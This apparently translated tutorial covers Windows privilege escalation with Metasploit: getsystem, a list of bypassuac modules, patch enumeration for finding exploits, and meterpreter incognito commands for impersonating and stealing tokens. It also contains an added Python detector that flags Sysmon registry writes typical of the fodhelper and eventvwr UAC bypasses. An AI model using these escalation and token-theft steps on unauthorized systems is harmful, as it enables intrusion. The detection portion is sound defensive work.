Other privilege escalation methods
meterpreter> getsystem
MSF ships several built-in bypassuac modules. They rely on different mechanisms but are used the same way: after the module runs it returns a new session, and running getsystem again in that session yields SYSTEM privileges.
search bypassuac

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   1  exploit/windows/local/bypassuac                   2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   2  exploit/windows/local/bypassuac_comhijack         1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   3  exploit/windows/local/bypassuac_eventvwr          2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   4  exploit/windows/local/bypassuac_fodhelper         2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
   5  exploit/windows/local/bypassuac_injection         2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
   6  exploit/windows/local/bypassuac_injection_winsxs  2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   7  exploit/windows/local/bypassuac_sluihijack        2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   8  exploit/windows/local/bypassuac_vbs               2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)

Use MSF's enum_patches module to collect the installed-patch information, then look up usable exploits for privilege escalation.
Based on the vulnerabilities left open by the missing patches, use the corresponding exploit modules available in MSF to escalate privileges.
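The eventvwr and fodhelper modules in the list above are registry-key techniques: each of them sets a per-user (HKCU) file-handler key that an auto-elevating Windows binary then consults. That gives a defender a concrete thing to alert on. The following is an added detection example written for this page, not code from Metasploit or from the original post: it parses Sysmon-style registry "value set" events (Event ID 13) and flags writes under the two well-known handler keys those techniques modify. The log lines and the simplified key=value field layout are constructed for the example; real Sysmon events are XML and would need a different parser front end.

```python
import re

# Per-user registry keys (relative to the user's hive) that the FodHelper and
# Eventvwr UAC bypass techniques modify. Mapping is constructed for this example
# from the module names in the search output; keys are stored lower-case.
UAC_BYPASS_REGISTRY_KEYS = {
    r"software\classes\ms-settings\shell\open\command": "bypassuac_fodhelper",
    r"software\classes\mscfile\shell\open\command": "bypassuac_eventvwr",
}

# CONSTRUCTED sample records in a simplified key=value rendering of Sysmon
# Event ID 13 (RegistryEvent: value set); not real telemetry.
SAMPLE_LOG_LINES = [
    "EventID=13 User=PIG\\testpig Image=C:\\Windows\\System32\\reg.exe "
    "TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\ms-settings\\shell\\open\\command\\(Default)",
    "EventID=13 User=PIG\\testpig Image=C:\\Windows\\System32\\reg.exe "
    "TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\ms-settings\\shell\\open\\command\\DelegateExecute",
    "EventID=13 User=PIG\\svc_backup Image=C:\\Windows\\explorer.exe "
    "TargetObject=HKU\\S-1-5-21-1111-2222-3333-1002\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
    "EventID=13 User=PIG\\testpig Image=C:\\Windows\\System32\\cmd.exe "
    "TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\mscfile\\shell\\open\\command\\(Default)",
    "EventID=1 User=PIG\\testpig Image=C:\\Windows\\System32\\fodhelper.exe CommandLine=fodhelper.exe",
]

# key=value pairs; a value runs until the next " key=" token or end of line,
# so values such as registry paths may contain backslashes and parentheses.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

# Hive prefixes that denote a per-user hive: HKU\<SID>\ or HKCU\ spellings.
HIVE_RE = re.compile(
    r"^(hku\\s-1-5-[\d-]+|hkey_users\\s-1-5-[\d-]+|hkcu|hkey_current_user)\\", re.I
)


def parse_line(line):
    """Parse one key=value log line into a dict of field name -> value."""
    return {k: v for k, v in FIELD_RE.findall(line)}


def registry_key_relative_to_user_hive(target_object):
    """Strip the per-user hive prefix and lower-case the remainder.

    Returns None when the path is not under a per-user hive (for example
    HKLM), because the two watched techniques only touch HKCU.
    """
    m = HIVE_RE.match(target_object)
    if not m:
        return None
    return target_object[m.end():].lower()


def detect_uac_bypass_registry(lines):
    """Return (technique, user, image, target_object) for each value-set event
    whose target lies under one of the watched handler keys."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev.get("EventID") != "13":
            continue
        rel = registry_key_relative_to_user_hive(ev.get("TargetObject", ""))
        if rel is None:
            continue
        for key, technique in UAC_BYPASS_REGISTRY_KEYS.items():
            if rel == key or rel.startswith(key + "\\"):
                hits.append((technique, ev.get("User"), ev.get("Image"), ev["TargetObject"]))
                break
    return hits


def summarize_by_user(hits):
    """Group detections by user so a single bypass attempt (several value
    writes to the same key) is reported once per user and technique."""
    summary = {}
    for technique, user, _image, _target in hits:
        summary.setdefault(user, set()).add(technique)
    return {user: sorted(techs) for user, techs in summary.items()}


if __name__ == "__main__":
    for technique, user, image, target in detect_uac_bypass_registry(SAMPLE_LOG_LINES):
        print(f"[{technique}] user={user} image={image} target={target}")
    print(summarize_by_user(detect_uac_bypass_registry(SAMPLE_LOG_LINES)))
```

The two ordinary registry events in the sample (a Run key write and a process-creation event) are ignored; only writes beneath the two handler keys are reported, and the per-user summary collapses the two fodhelper value writes into one finding. In practice the same check belongs in a SIEM rule keyed on Sysmon Event ID 13, with the matched Image field used to separate legitimate installers from a shell or reg.exe run under a low-privilege session.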
use incognito # help incognito shows the command help
list_tokens -u # list the available tokens
impersonate_token PIG\\testpig or impersonate_token 'PIG\testpig' # impersonate testpig's token; without single quotes the backslash must be doubled (\\)
execute -f cmd.exe -i -t # -t runs cmd.exe with the impersonated token; alternatively, type shell to open a terminal under the current token
rev2self # revert to the original token
steal_token <pid> # steal the token from the given process; run ps first to list process details
drop_token # discard the stolen token